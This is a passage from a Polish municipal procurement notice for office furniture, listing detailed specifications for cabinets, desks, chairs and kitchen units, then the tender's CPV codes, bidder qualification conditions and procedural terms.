poufnych	Klasa A. Korpus i drzwi z blachy min. 1mm grubości. Zamek kluczowy, mechaniczny w klasie A wg normy EN 1300, zabezpieczony przed próbą włamania np. przewierceniem. Mechanizm ryglowy na trzech krawędziach drzwi. Rygle o średnicy min. 11mm. Zawiasy drzwi schowane. Wewnątrz szafy 4 przestawne półki.Wymiary: 100x40x190 cm	1 sztuk28. Szafa aktowo-ubraniowa	Szafa z drzwiami na całej wysokości, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Wewnątrz przestrzeń do wieszania ubrań na wysuwanym uchwycie oraz półkirozstawem przystosowane do przechowywania akt.Wymiary: 80x37x185 cm 4 sztuk29. Szafa ubraniowa	Szafa z drzwiami na całej wysokości, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Wewnątrz przestrzeń do wieszania ubrań. Wymiary: 80x37x185 cm 1 sztuk30.	Nadstawka szafy aktowej	Szafka - nadstawka aktowa 2-półkowa z drzwiami na całej wysokości, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie.Wymiary: 80x37x76 cm	13 sztuk31.	Wieszak metalowy	Wolnostojący wieszak dwustronny, dwurzędowy, wykonany z profili stalowych min. 40x40mm malowanych farbą proszkową na kolor uzgodniony z Zamawiającym.Wieszak w każdym rzędzie powinien mieć po 10 wspawanych haczyków do zawieszenia ubrań czyli 60 zawiesi łącznie. Konstrukcja wieszaka powinna zapewniać jego stabilność.Wymiary: 150-170x60-70x180-190 cm 3 sztuk32.	Biurko kształtowe w kształcie litery L - prawe	Biurko kształtowe w kształcie litery L, z prostą - dostawną do ściany krótszą krawędzią blatu i prostą krawędzią dostawną do szafki/dostawki biurka oraz zaokrąglonymi pozostałymi krawędziami. Blat biurka wykonany z płyty meblowej melaminowanej w klasie higieny E1 o grubości 25mm. Stelaż stanowią stopy metalowe w kształcie litery L, malowane farbą proszkową na kolor RAL9006 połączone pod blatem belką wzmacniającą nadająca konstrukcji odpowiedniejstabilności i zabezpieczającą blat przed uginaniem. Osłona - blenda wykonana z blachy perforowanej, malowanej farbą proszkową na kolor RAL9006 Stopki z regulacją, umożliwiającąwypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych.Biurko prawe.Wymiary: 160/100x90/50x75 cm	2 sztuk33.	Biurko kształtowe w kształcie litery L - lewe	Biurko kształtowe w kształcie litery L, z prostą - dostawną do ściany krótszą krawędzią blatu i prostą krawędzią dostawną do szafki/dostawki biurka oraz zaokrąglonymi pozostałymi krawędziami. Blat biurka wykonany z płyty meblowej melaminowanej w klasie higieny E1 o grubości 25mm. Stelaż stanowią stopy metalowe w kształcie litery L, malowane farbą proszkową na kolor RAL9006 połączone pod blatem belką wzmacniającą nadająca konstrukcji odpowiedniejstabilności i zabezpieczającą blat przed uginaniem. Osłona - blenda wykonana z blachy perforowanej, malowanej farbą proszkową na kolor RAL9006 Stopki z regulacją, umożliwiającąwypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych.Biurko lewe.Wymiary: 170/90x80/50x75 cm 1 sztuka34.	Stół na stelażu metalowym	Blat z płyty meblowej melaminowanej w klasie higieny E1 o grubości 25mm na stelażu ramowym, spawanym, wykonanym z kształtownika stalowego, malowanego farbą proszkową 20x30(rama) i 50x50(nogi). Stopki umożliwiające wypoziomowanie.Wymiary:190x90x75 cm	8 sztuk35.	Szafa na plany i rysunki w rulonach	Szafa z drzwiami na całej wysokości, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Wewnątrz szafy przegrody do przechowywania pionowo rulonów z planami i rysunkami.Wymiary: 80x37x185 cm	1 sztuka36.	Szafka do biurka	Szafka z drzwiami na całej wysokości, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Wewnątrz szafy dwie półki, z czego jedna dostosowana do wysokości segregatora.Wymiary: 40x50x75 cm	1 sztuka37.	Szafka do biurka	Szafka z drzwiami przesuwnymi, zamykanymi zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Wewnątrz szafy dwie półki, z czego jedna dostosowana do wysokości segregatora.Wymiary: 80x50x75 cm	2 sztuki38.	Dostawka do biurka z szufladami	Dostawka z czterema szufladami zamykanymi zamkiem centralnym, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, korpus z płyty 18mm. Nawis blatu z lewej strony szuflad 22cm. Dostawka montowana do blatu biurka za pomocą płaskowników przykręcanych pod blatami biurka i dostawki.Wymiary: 65x50x75 cm 1 sztuka39.	Szafka niska	Szafka jednodrzwiowa, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Wewnątrz szafy dwie półki, z czego jedna dostosowana do wysokości segregatora.Wymiary: 42x37x75 cm 1 sztuka40.	Zestaw mebli gabinetowych	- 1 sztuka Meble, charakteryzujące się prestiżowym, eleganckim wzornictwem. Blaty, nogi biurek, stołów oraz wieńce szaf i regałów wykonane z klejonej, podwójnej płyty o grubości 36mm, pozostałe elementy - korpusy mebli wykonane z płyty o grubości 18mm. Płyta meblowa melaminowana w klasie higieny E1. Obrzeża zabezpieczone okleiną PCV o grubości 2mm. Szafy z drzwiami płytowymi oraz ze szkła hartowanego antisol, o grubości 6mm, barwionego na kolor ciemno szary/grafitowy. Zawiasy łączone ze szkłem za pomocą kleju utwardzanego za pomocą technologii UV. Uchwyty poziome wpuszczone w drzwi lub fronty szuflad.W skład zestawu wchodzą:1)	Szafa ubraniowa z komorą, w której znajduje się wysuwany uchwyt do zawieszania ubrań na wieszakach oraz półką powyżej i kolumną boczną z pięcioma półkami. Wymiary: 80x42x188 cm ilość: 1 szt.2)	Szafa aktowa 5-cio półkowa. Wymiary: 80x42x188 cm ilość: 2 szt.3)	Szafa aktowa 3 półkowa z drzwiami szklanymi. Wymiary: 80x42x120 cm ilość: 1 szt.4)	Stół konferencyjny dla 6-ciu osób z zaokrąglonymi bokami blatu oraz nóg. Wymiary: 180x100x75 cm ilość: 1 szt.5)	Biurko łukowe z zaokrąglonymi krawędziami blatu - wypukłymi od frontu i po bokach oraz wklęsłą od strony użytkownika. Krawędzie nóg zaokrąglone, wypukłe. Wymiary: 2100x105x75 cm ilość: 1 szt.6)	Szafka dostawna do biurka. Szafka 3-kolumnowa - po bokach szafki zamykane, środek z czterema szufladami. Wymiary: 90x50x71,4 ilość: 1 szt.7)	Blat kryjący do szafki dostawnej z wycięciem pasującym do krzywizny blatu biurka. Wymiary: 180x60 ilość: 1 szt.	41.	Krzesło obrotowe pracownicze	- 26 sztuk Krzesło tapicerowane z miękkim szerokim siedziskiem i miękkim, ergonomicznie profilowanym oparciem:- mechanizm krzesła pozwalający na swobodne kołysanie użytkownika, bądź niezależną blokadę kąta nachylenia siedziska i oparcia w dowolnej pozycji. Siła oporu odchylenia oparcia regulowana za pomocą śruby. Oparcie o szerokości 47cm i wysokości 56 cm z możliwością regulacji góra-dół,- podłokietniki z regulacją góra-dół z miękkimi nakładkami z tworzywa,- szerokość pomiędzy podłokietnikami min. 42 cm,- regulacja wysokości siedziska/krzesła,- krzesło na podstawie pięcioramiennej z trwałego, solidnego tworzywa sztucznego w kolorze czarnym,- kółka dostosowane do twardych powierzchni,- tapicerka z certyfikatem trudnozapalności EN1021-1 i -2; minimum 160 tys. Cykli Martindale'a, gramatura min 350g/m2; - kolor tapicerki do ustalenia z Zamawiając	42.	Krzesło obrotowe menadżerskie	- 2 sztuki Krzesło miękkie, tapicerowane, szerokie, komfortowe siedzisko z możliwością regulacji przód - tył- ergonomicznie wyprofilowane, miękkie oparcie tapicerowane wysokogatunkową siatką z regulowanym góra-dół podparciem dla lędźwi,- mechanizm krzesła pozwalający na swobodne kołysanie użytkownika, bądź blokadę w kilku pozycjach. Siedzisko i oparcie odchylają się synchronicznie. Siła oporu odchylenia oparcia i siedziska regulowana za pomocą śruby.- oparcie o szerokości 44 cm i wysokości 51 cm,- podłokietniki z regulacją góra-dół i przód-tył z miękkimi nakładkami z tworzywa,- szerokość między podłokietnikami min. 49 cm,- regulacja wysokości siedziska/krzesła,- przęsło na podstawie pięcioramiennej wykonanej lakierowanego aluminium,- tapicerowany zagłówek,- kółka dostosowane do twardych powierzchni- tapicerka z certyfikatem trudnozapalności EN1021-1 i -2; minimum 160 tys. Cykli Martindale'a, gramatura min 350g/m2; kolor tapicerki do ustalenia z Zamawiającym	43.	Krzesło stacjonarne	Miękkie, wygodne, krzesło tapicerowane. Stelaż metalowy, wykonany z profilu płasko-owalnego 30x15mm, o grubości ścianki 1,5mm, chromowanego. Siedzisko o szerokości 47cm i głębokości 41cm, oparcie o szerokości 48cm i wysokości 34cm.Krzesła z możliwością sztaplowania min. 8 sztuk.Tapicerka krzesła o gramaturze minimum 220g/m2 i odporności na ścieranie minimum 35 tys. Cykli Martindale'a.	11044.	Krzesło stacjonarne	Miękkie, wygodne, krzesło tapicerowane. Stelaż metalowy, wykonany z profilu płasko-owalnego 30x15mm, o grubości ścianki 1,5mm, chromowanego. Siedzisko o szerokości 47cm i głębokości 41cm, oparcie o szerokości 48cm i wysokości 34cm.Krzesła z możliwością sztaplowania min. 8 sztuk.Tapicerka krzesła o gramaturze minimum 450g/m2 i odporności na ścieranie minimum 30 tys. Cykli Martindale'a łatwa w utrzymaniu czystości - typu skaj	1145. Krzesło konferencyjne	Krzesło stylistycznie i kolorystycznie pasujące do krzeseł obrotowych menadżerskich. Krzesło na stelażu metalowym, płozowym z miękkim, szerokim, komfortowym, tapicerowanym siedziskiem i miękkim, wysokim, tapicerowanym wysokogatunkową siatką oparciem. Podłokietniki zintegrowane z ramą krzesła z tapicerowanymi nakładkami. Tapicerka z certyfikatem trudnozapalności EN1021-1 i -2; minimum 160 tys. Cykli Martindale'a, gramatura min 350g/m2; kolor tapicerki do ustalenia z Zamawiającym.	646. Fotel konferencyjny, gabinetowy	Fotel obrotowy, oparcie zintegrowane z podłokietnikami. Całość tapicerowana. Fotel na podstawie stalowej, chromowanej, czteroramiennej. Szerokość całkowita 48-50cm, głębokość całkowita 50-52cm, wysokość całkowita 78- 80cm. Minimalne parametry tapicerki: gramatura 450g/m2, odporność na ścieranie 30 tys. Cykli Martindale'a.	6 sztuk47. Fotel gabinetowy	Miękkie, szerokie, wygodne siedzisko, wysokie, ergonomicznie profilowane oparcie i zagłówek tapicerowane skórą naturalną, pikowane. Mechanizm synchroniczny pozwalający na swobodne kołysanie użytkownika i blokadę siedziska wraz z oparciem w dowolnej pozycji. Regulacja siły oporu oparcia w zależności od wagi użytkownika za pomocą pokrętła. Podłokietniki regulowane góra-dół z miękkimi nakładkami z tworzywa. Regulowana wysokość siedziska/fotela. Podstawa pięcioramienna z polerowanego aluminium. Kółka do twardych powierzchni. Kolor skóry do ustalenia z Zamawiającym	1 sztuka48.	Wieszak ubraniowy	Stabilny, spawany wieszak metalowy - z rury o średnicy 60mm - kolumna, 32mm i 20mm o grubości ściany 1,5mm. Całość malowana farbą proszkową na kolor czarny lub szary - do ustalenia z Zamawiającym. Stopki wieszaka zabezpieczone stopkami z tworzywa.Wymiary: 65x65x175 cm	1349.	Zabudowa meblowa niska do pomieszczenia socjalnego	Meble wykonane z płyty meblowej melaminowanej w klasie higieny E1 o grubości 18mm. Zabudowa składa się z dwóch szafek dwudrzwiowych, z czego jedna ze zlewem wpuszczanym, jednokomorowym z ociekaczem, oraz słupka z czterema szufladami na prowadnicach kulkowych. Całość krytablatem kuchenny o grubości 38 mm.Wymiary całości: 200x45x85 cm - Wymiary są przybliżone. Oferent powinien dokonać wizji lokalnej by je zweryfikować.	1 sztuka51.	Zabudowa meblowa niska do pomieszczenia socjalnego	Meble wykonane z płyty meblowej melaminowanej w klasie higieny E1 o grubości 18mm. Zabudowa składa się z trzech szafek dwudrzwiowych, z czego jedna ze zlewem wpuszczanym, jednokomorowym z ociekaczem, łącznika narożnego oraz słupka z pięcioma szufladami na prowadnicach kulkowych. Całość ustawiona wzdłuż ścian w kształcie litery L, kryta blatem kuchennym o grubości 38mm.Wymiary całości: 450x60x85 cm - Wymiary są przybliżone. Oferent powinien dokonać wizji lokalnej by je zweryfikować.	1 sztuka52.	Zabudowa meblowa górna do pomieszczenia socjalnego	Meble wykonane z płyty meblowej melaminowanej w klasie higieny E1 o grubości 18mm. Zabudowa składa się z dwóch szafek dwudrzwiowych, wiszących.Wymiary całości: 160x34x60 cm - Wymiary są przybliżone. Oferent powinien dokonać wizji lokalnej by je zweryfikować.	1 sztuka53.	Zlew gospodarczy	Komora gospodarcza wykonana ze stali nierdzewnej o grubości min. 0,7mm, montowana do ściany.Wymiary: 53x43x22 cm	1 sztuka54.	Szafka - obudowa podgrzewacza wody	Szafka dwudrzwiowa, bez pleców, wykonana z płyty meblowej, melaminowanej, w klasie higieny E1, o grubości 18mm, kryta blatem postformingowym. Szafka na stopkach lub stelażu o wysokości min. 10cm.Wymiary: 70x40x80 cm - Wymiary są przybliżone. Oferent powinien dokonać wizji lokalnej by je zweryfikować.	1 sztuka55.	Zabudowa meblowa niska do pomieszczenia socjalnego	Meble wykonane z płyty meblowej melaminowanej w klasie higieny E1 o grubości 18mm. Zabudowa składa się z dwóch szafek dwudrzwiowych, z czego jedna ze zlewem wpuszczanym, jednokomorowym z ociekaczem. Całość krytablatem kuchenny o grubości 38 mm.Wymiary całości: 140x45x85 cm - Wymiary są przybliżone. Oferent powinien dokonać wizji lokalnej by je zweryfikować.	1 sztuka56.	Zabudowa meblowa górna do pomieszczenia socjalnego	Meble wykonane z płyty meblowej melaminowanej w klasie higieny E1 o grubości 18mm. Zabudowa składa się z dwóch szafek dwudrzwiowych z półkami, wiszących.Wymiary całości: 140x34x60 cm - Wymiary są przybliżone. Oferent powinien dokonać wizji lokalnej by je zweryfikować.	1 sztuka57.	Zabudowa meblowa niska do pomieszczenia socjalnego	Meble wykonane z płyty meblowej melaminowanej w klasie higieny E1 o grubości 18mm. Zabudowa składa się z dwóch szafek dwudrzwiowych oraz słupka z pięcioma szufladami na prowadnicach kulkowych. Całość kryta blatem kuchenny o grubości 38 mm.Wymiary całości: 150x45x85 cm - Wymiary są przybliżone. Oferent powinien dokonać wizji lokalnej by je zweryfikować.	1 sztuka</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39130000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39131000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39150000-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">40</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">40 dni roboczych od dnia podpisania umowy</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, w sposób należyty co dwóch zamówień polegających na dostawie i montażu mebli do siedziby Urzędu Gminy o łącznej wartości robót nie mniejszej niż 40 000 zł (z podatkiem VAT) dla każdego z zamówień - jeżeli wartość zamówienia została określona w walutach innych niż PLN zamawiający przyjmuje średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu zakończenia realizacji robót budowlanych - jeżeli w dniu zakończenia realizacji robót budowlanych NBP nie publikował średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia po dniu zakończenia realizacji robót budowlanych w którym zostanie on opublikowany</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Zamawiający działając na podstawie art. 26 ust. 2 ustawy odstępuje od żądania dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 pkt 3 ustawy PZP.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">Oświadczenie wstępne o braku podstaw wykluczenia z udziału w postępowaniu wg wzoru stanowiącego załącznik Nr 2 do SIWZ - na zasadach określonych w sekcji 7 SIWZ. Na wezwanie zamawiającego skierowane do wykonawcy po dokonanej analizie i badaniu ofert (tylko wykonawca, którego oferta została najwyżej oceniona):a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane - wzór wykazu stanowi załącznik do SIWZ, z załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty, </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert (o której mowa w art. 86 ust. 5 ustawy), samodzielnie (bez odrębnego wezwania ze strony zamawiającego) przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej z innymi wykonawcami składającymi oferty w danym postępowaniu (o której mowa w art. 24 ust. 1 pkt 23 PZP) - wg załącznika nr 3 do SIWZ. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.Jeżeli wykonawca nie złoży oświadczenia, o którym mowa w sekcji 6.15, lub oświadczenie jest niekompletne, zawiera błędy lub budzi wskazane przez zamawiającego wątpliwości, zamawiający wezwie do jego złożenia, uzupełnienia lub poprawienia lub do udzielania wyjaśnień w terminie przez siebie wskazanym, chyba że mimo ich złożenia, uzupełnienia lub poprawienia lub udzielenia wyjaśnień oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span 